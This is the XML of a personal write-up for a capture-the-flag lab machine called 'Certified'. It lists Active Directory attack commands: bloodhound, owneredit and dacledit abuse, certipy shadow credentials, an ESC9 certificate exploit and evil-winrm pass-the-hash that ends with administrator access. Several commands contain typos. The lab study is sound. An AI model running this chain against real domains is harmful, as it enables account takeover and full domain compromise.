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70DFBB1B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E71994">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Certified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3CF43139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CC50C0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> In this lab, we will learn the concept of inter connection more then 3 times to change the roles, password and provide me the permission to read and write and so on.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5D42B51E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E71994">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> nmap -sC -sV </w:t>
      </w:r>
      <w:r w:rsidR="00B1191F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>t_</w:t>
      </w:r>
      <w:r w:rsidR="00E71994">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>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E3D38E" w14:textId="0EE8D5B6" w:rsidR="005B050C" w:rsidRPr="005117D3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Enumeration</w:t>
      </w:r>
      <w:r w:rsidR="005B050C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> = not web</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="496E2E97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t_ip -u judith.mader -p judith09 - -shares = its not seem to be useful</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22FE2F0C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t_ip -u judith.mader -p judith09 - -users = to obtain the users list</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C5FB12F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certipy find -dc-ip t_ip -vulnerable -u judith.mader -p judith09</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E1D1909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there has no vulnerable templates for users</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="057906A0" w14:textId="77777777" w:rsidR="00426CD3" w:rsidRDefault="00426CD3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55B5B65B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certipy find -dc-ip t_ip -u judith.mader -p judith09</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3721ACF5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see certifiedauthentication &amp; RASandIASservers has operator ca which is not admin.its important but RASandIASserves are not important because its function</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21F4FC10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certipy find -dc-ip t_ip -u judith.mader -p judith09 -json = as filtering </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E76A91C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so we obtain the json file </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="394272F6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bloodhound.py -ns t_ip -d certified.htb -u ‘judith.mader’ -p ‘judith09’ -c all </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45410E66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start the bloodhound with neo4j </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BD24062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we have then file ingest add file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0DA2FF6E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we have v=credentials so try those.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="412DD74F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t_ip -u judith.mader -p judith09</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16A9BBF5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Judith.mader  as owner  and outbound control with management control. Also management control has outbound with management_svc control. Also management_svc has outbound control with ca_operator</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="089C59B5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pathfinding with Judith to ca_operator</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="712A34F7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rpc group -h = to add member</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B3EDB1E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rpc group members management -U certified/judith.mader%judith09 -S t_ip</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3569039D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owneredit.py -dc-ip t_ip -action write -new-owner judith.mader -target management certified/judith.mader:judith09 = it done as domain admins</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18BC5F4D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rpc group members management -U certified/judith.mader%judith09 -S t_ip</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DA0C878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owneredit.py -dc-ip t_ip -action write -new-owner judith.mader -target management certified/judith.mader:judith09 = it done as Judith mader</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C375F9C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give a write to user</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="235BD078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rpc group addmem Management judith.mader -U certified/judith.mader%judith09 -S t_ip</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14595B8C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even we own the group we still haven’t access </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0727A8E9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dacledit.py -dc-ip t_ip -action write -rights WriteMembers -principal judith.mader -target management certified/judith.mader:judith09 = now we gives ability to add user</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1787A67F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rpc group addmem Management judith.mader -U certified/judith.mader%judith09 -S t_ip = its done now</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A0B2449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rpc group members management -U certified/judith.mader%judith09 -S t_ip = list  management_svc with Judith.mader</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="287BEFAB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 now we are at the 2</w:t>
      </w:r>
      <w:r w:rsidRPr="003135F3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>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> step of bloodhound = we want to take over manege_svc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35A64338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certipy shadow auto -target certified.htb -dc-ip t_ip -username </w:t>
      </w:r>
      <w:hyperlink r:id="rId5" w:history="1">
        <w:r w:rsidRPr="00506C50">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>judith.mader@certified.htb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-password judith09 -account management_svc = this is adding certification to users to authenticate and grep TGT for ntlm hash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="466D9BDA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fail then ntpdate t_ip</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7600D23C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have nt hash = now for the ca_operation we did same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5C2DC30" w14:textId="440822B1" w:rsidR="00843DCE" w:rsidRPr="00CC50C0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6580546D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certipy shadow auto -target certified.htb -dc-ip t_ip -username </w:t>
      </w:r>
      <w:hyperlink r:id="rId6" w:history="1">
        <w:r w:rsidRPr="00506C50">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>management_svc@certified.htb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-hashes :paste -aacount ca_operator</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0733C3DA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and obtain nt ahsh for ca_operator</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67ED2509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certipy find -dc-ip t_ip -vulnerable -u ca_operator -hashes :paste -stdout</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FB2B5DF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vulnerability ESC9</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55F7D931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search certify ESC9 = cyber risk = certify 4.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20541AF3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certify account update -dc-ip t_ip-u management_svc -hashes :past  -user ca_operator -upn Administrator = here we change to the ca_operator to administrator</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="559A9034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req a certificate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="259AF003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certipy req -u ca_operator -hashes :paste -dc-ip t_ip -ca certified-DC01-CA -template CertifiedAuthentication -debug</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43F663C1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just remove debug</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E5DB396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that command info from vulnerable template or all template which we filters</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BBF5E7A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certify account update -dc-ip t_ip-u management_svc -hashes :past  -user ca_operator -upn </w:t>
      </w:r>
      <w:hyperlink r:id="rId7" w:history="1">
        <w:r w:rsidRPr="00506C50">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>ca_operator@certified.htb</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0798581F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certipy auth -pfx administrator.pfx -dc-ip t_ip -domain certified.htb</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A796304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hashes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DD894C7" w14:textId="77777777" w:rsidR="00CC50C0" w:rsidRDefault="00CC50C0" w:rsidP="00CC5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evil-winrm -I t_ip -u administrator -H :paste</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EEA81BF" w14:textId="77777777" w:rsidR="00CC50C0" w:rsidRDefault="00CC50C0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581F29FD" w:rsidR="00A311DF" w:rsidRPr="00843DCE" w:rsidRDefault="009F5D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In administrator Desktop we notice the root.txt</w:t>
      </w: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2673E"/>
    <w:rsid w:val="00063A20"/>
    <w:rsid w:val="000C3180"/>
    <w:rsid w:val="001C7107"/>
    <w:rsid w:val="001D3D30"/>
    <w:rsid w:val="0020459A"/>
    <w:rsid w:val="00250F12"/>
    <w:rsid w:val="002A2006"/>
    <w:rsid w:val="002C3D07"/>
    <w:rsid w:val="002F3066"/>
    <w:rsid w:val="003135F3"/>
    <w:rsid w:val="00332CAF"/>
    <w:rsid w:val="003A04D6"/>
    <w:rsid w:val="0042216D"/>
    <w:rsid w:val="00426CD3"/>
    <w:rsid w:val="00427E37"/>
    <w:rsid w:val="00434ADD"/>
    <w:rsid w:val="00471BD3"/>
    <w:rsid w:val="004A1131"/>
    <w:rsid w:val="004C37A9"/>
    <w:rsid w:val="004D7244"/>
    <w:rsid w:val="00507B70"/>
    <w:rsid w:val="005117D3"/>
    <w:rsid w:val="0055326A"/>
    <w:rsid w:val="005925FA"/>
    <w:rsid w:val="005B050C"/>
    <w:rsid w:val="006108A4"/>
    <w:rsid w:val="006236AF"/>
    <w:rsid w:val="006501DF"/>
    <w:rsid w:val="006A61B4"/>
    <w:rsid w:val="006D598E"/>
    <w:rsid w:val="006F7E81"/>
    <w:rsid w:val="00747EAD"/>
    <w:rsid w:val="00771AAA"/>
    <w:rsid w:val="0079103F"/>
    <w:rsid w:val="007B5C87"/>
    <w:rsid w:val="007B747A"/>
    <w:rsid w:val="007D3FCA"/>
    <w:rsid w:val="007E6493"/>
    <w:rsid w:val="007F3245"/>
    <w:rsid w:val="00842E14"/>
    <w:rsid w:val="00843DCE"/>
    <w:rsid w:val="00892C30"/>
    <w:rsid w:val="008F0F37"/>
    <w:rsid w:val="00921CB4"/>
    <w:rsid w:val="00977736"/>
    <w:rsid w:val="009D7C0C"/>
    <w:rsid w:val="009F5D62"/>
    <w:rsid w:val="009F7596"/>
    <w:rsid w:val="00A311DF"/>
    <w:rsid w:val="00A5666B"/>
    <w:rsid w:val="00A84B26"/>
    <w:rsid w:val="00AB0969"/>
    <w:rsid w:val="00AB3197"/>
    <w:rsid w:val="00AD0FE5"/>
    <w:rsid w:val="00B1191F"/>
    <w:rsid w:val="00B61A40"/>
    <w:rsid w:val="00B85153"/>
    <w:rsid w:val="00B90701"/>
    <w:rsid w:val="00C845EB"/>
    <w:rsid w:val="00CC50C0"/>
    <w:rsid w:val="00CC511B"/>
    <w:rsid w:val="00CE6AFB"/>
    <w:rsid w:val="00CE6E3B"/>
    <w:rsid w:val="00CE7669"/>
    <w:rsid w:val="00D27936"/>
    <w:rsid w:val="00D37044"/>
    <w:rsid w:val="00D91D4A"/>
    <w:rsid w:val="00DB7AEE"/>
    <w:rsid w:val="00DC4B01"/>
    <w:rsid w:val="00DD0038"/>
    <w:rsid w:val="00E676A7"/>
    <w:rsid w:val="00E71994"/>
    <w:rsid w:val="00F54AE0"/>
    <w:rsid w:val="00F578D1"/>
    <w:rsid w:val="00F66E02"/>
    <w:rsid w:val="00FC6E5F"/>
    <w:rsid w:val="00FF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15B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C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C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a_operator@certified.htb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management_svc@certified.htb" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:judith.mader@certified.ht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5258B-D9E8-47D6-90AB-64683C113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70</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-11-25T12:17:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-12-22T15:16:00Z</dcterms:modified>
</cp:coreProperties>
</file>